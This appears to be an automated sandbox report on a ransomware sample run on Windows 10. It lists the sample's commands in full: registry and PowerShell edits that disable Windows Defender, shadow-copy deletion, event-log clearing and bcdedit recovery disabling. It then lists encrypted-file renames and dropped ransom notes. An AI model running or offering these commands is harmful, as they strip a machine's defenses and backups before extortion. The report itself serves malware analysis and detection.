| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application |
| C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive |
| C:\Windows\System32\Wbem\wmic.exe | wmic.exe shadowcopy delete |
| C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
| C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled no |
| C:\Windows\system32\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 5320851668c91e6c29a32dd7e6eaff3d |
| SHA1 | b4aeed87a44ab583c09e2f8ddc526061be64a915 |
| SHA256 | 84012d4d2718c4739d9d8e44b6c7e4d1bfd77cba733270399487a24b6908e54f |
| SHA512 | 18a91a75f685b4299ad75a10d534cca20ae096a1dcdc005afa50d238671cec95dea3fc610589e24dba7a7e91bd848ba6830f855caf7208418faadf2626651fab |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 13:15
Reported
2022-01-13 13:20
Platform
win10-en-20211208
Max time kernel
289s
Max time network
130s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\UseWait.crw => C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupSuspend.png => C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointComplete.crw => C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OptimizeProtect.crw => C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AddRename.tif => C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\REFSAN.TTF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Y1GsQV_cY6E0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\MusicStoreLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\SampleCompetitor1.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\de-DE.PhoneNumber.model | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_MgKNg1AaXwo0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_QgIUCkSihqU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_K_rMK21o79s0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_oiENgAPckLA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\auw1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.INF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5fCUf-ud1rw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\Fonts\PplMDL2.1.69.ttf | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_WJSZIzruWLc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Stripes\NewCollection.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_tAIMHVI0aH80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\152.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\shake.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-125.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\selector.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yoQWcHNCJ3c0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_A_QgvbPrkFM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MapsWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UDM3wmGVyaw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_J4pmeqDADjA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\11.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PkTd1_LeDyI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_dg9IXi3igwQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_XGYOS4ofS8o0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\bigsmile.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O2cnd3eq5Og0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_TatpvflUFuU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\auw1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_I43Fb5E1LwI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_link_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rnudMbOH3fU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5Po6Ebfagms0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8041_40x40x32.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Yx9WfN-CpJg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_It0oHGMeD-c0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Density_Hollow.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
